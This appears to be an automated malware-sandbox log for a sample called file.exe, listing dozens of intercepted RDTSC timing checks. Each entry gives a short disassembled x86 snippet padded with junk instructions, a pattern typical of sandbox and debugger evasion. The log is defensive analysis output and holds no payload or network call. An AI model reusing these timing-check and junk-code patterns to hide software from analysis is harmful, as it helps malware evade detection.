                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11638CE second address: 11638D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1163BD9 second address: 1163BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6F31ADDF6Ah 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1163BEE second address: 1163BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1163BF6 second address: 1163BFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1163BFC second address: 1163C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1163C00 second address: 1163C09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1163EDA second address: 1163EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1164460 second address: 1164483 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6F31ADDF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F6F31ADDF6Ch 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 push edi 0x00000018 pop edi 0x00000019 push edi 0x0000001a pop edi 0x0000001b pop esi 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1168B2E second address: 1168B40 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6F31405BDAh 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E121 second address: 113E127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E223 second address: 113E227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E351 second address: 113E357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E357 second address: 113E35C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E907 second address: 113E90B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E90B second address: 113E92E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], esi 0x0000000a mov ecx, 22BA7DFEh 0x0000000f nop 0x00000010 pushad 0x00000011 pushad 0x00000012 jns 00007F6F31405BD6h 0x00000018 jo 00007F6F31405BD6h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E92E second address: 113E932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113EB01 second address: 113EB05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113EB05 second address: 113EB0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113EC1F second address: 113EC42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 nop 0x00000009 cmc 0x0000000a push 00000004h 0x0000000c jng 00007F6F31405BDCh 0x00000012 or ecx, dword ptr [ebp+1247248Bh] 0x00000018 push eax 0x00000019 jg 00007F6F31405BE0h 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113F236 second address: 113F259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F6F31ADDF66h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113F259 second address: 113F267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F6F31405BDCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113F353 second address: 113F3C6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e pushad 0x0000000f sub dword ptr [ebp+122D1B3Eh], eax 0x00000015 mov eax, dword ptr [ebp+12448CE8h] 0x0000001b popad 0x0000001c lea eax, dword ptr [ebp+12482ED7h] 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007F6F31ADDF68h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 00000015h 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c movsx edi, cx 0x0000003f nop 0x00000040 jmp 00007F6F31ADDF76h 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F6F31ADDF77h 0x0000004d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1167D83 second address: 1167D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1167EDB second address: 1167EE0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116809D second address: 11680C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c jnl 00007F6F31405BD6h 0x00000012 pop eax 0x00000013 je 00007F6F31405BE2h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11680C0 second address: 11680C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116836F second address: 1168373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1168373 second address: 1168391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F6F31ADDF78h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1168391 second address: 1168396 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1168396 second address: 11683A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 je 00007F6F31ADDF66h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1170A2D second address: 1170A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6F31405BD6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1170A37 second address: 1170A3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1170B6E second address: 1170B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1170B72 second address: 1170B90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF74h 0x00000007 jnp 00007F6F31ADDF66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1170B90 second address: 1170BAC instructions: 0x00000000 rdtsc 0x00000002 js 00007F6F31405BDAh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F6F31405BDCh 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1171028 second address: 117102C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117102C second address: 1171046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6F31405BE1h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11711B8 second address: 11711DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F6F31ADDF6Ah 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11711DD second address: 11711E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1170715 second address: 117071B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1171A17 second address: 1171A1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1171A1D second address: 1171A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1171A29 second address: 1171A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1171A2D second address: 1171A33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1171A33 second address: 1171A4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007F6F31405BD6h 0x00000009 jnp 00007F6F31405BD6h 0x0000000f pop eax 0x00000010 ja 00007F6F31405BDEh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1177408 second address: 1177419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jc 00007F6F31ADDF66h 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1177419 second address: 117743D instructions: 0x00000000 rdtsc 0x00000002 je 00007F6F31405BEAh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F6F31405BE2h 0x0000000f jng 00007F6F31405BDCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11767A1 second address: 11767C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6F31ADDF66h 0x0000000a jmp 00007F6F31ADDF70h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11767C0 second address: 11767D4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6F31405BD6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11767D4 second address: 11767D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176E75 second address: 1176EA7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F6F31405BDEh 0x0000000e jmp 00007F6F31405BE6h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176EA7 second address: 1176EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1177271 second address: 1177282 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6F31405BDBh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117A9CA second address: 117A9CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117A9CF second address: 117A9D8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117D692 second address: 117D698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117D698 second address: 117D69E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117D69E second address: 117D6A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117D6A7 second address: 117D6AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117D6AB second address: 117D6B1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11801A8 second address: 11801B5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6F31405BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118059B second address: 118059F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11866D2 second address: 11866D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11866D6 second address: 11866E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11866E2 second address: 11866E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11866E8 second address: 11866EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11866EE second address: 11866F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11866F5 second address: 1186701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1186701 second address: 1186722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F31405BE4h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1186722 second address: 1186742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6F31ADDF79h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1185FFF second address: 118600B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F6F31405BD6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11863EB second address: 118640C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F31ADDF71h 0x00000009 js 00007F6F31ADDF66h 0x0000000f popad 0x00000010 pop ebx 0x00000011 push edx 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118A874 second address: 118A878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118F028 second address: 118F033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6F31ADDF66h 0x0000000a pop edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118F033 second address: 118F03B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118F2C1 second address: 118F2C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118F2C7 second address: 118F2D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jnp 00007F6F31405BD6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118F68C second address: 118F695 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196EC0 second address: 1196EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6F31405BD6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6F31405BE0h 0x00000012 jmp 00007F6F31405BE5h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FFD1B second address: 10FFD21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FFD21 second address: 10FFD33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007F6F31405BD6h 0x0000000c jnl 00007F6F31405BD6h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FFD33 second address: 10FFD37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11952CB second address: 11952E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F31405BE3h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11952E2 second address: 11952F9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F6F31ADDF6Eh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11952F9 second address: 11952FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11952FE second address: 1195304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11955FE second address: 119562E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F6F31405BE8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F6F31405BDEh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11958DC second address: 11958E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11958E7 second address: 11958EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11958EB second address: 11958FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1195C23 second address: 1195C4A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007F6F31405BD6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 je 00007F6F31405BE1h 0x00000019 jmp 00007F6F31405BDBh 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1195ECF second address: 1195ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1195ED5 second address: 1195EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11961F3 second address: 11961FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11961FA second address: 1196213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F6F31405BD6h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 jc 00007F6F31405BD6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196213 second address: 1196222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F6F31ADDF66h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
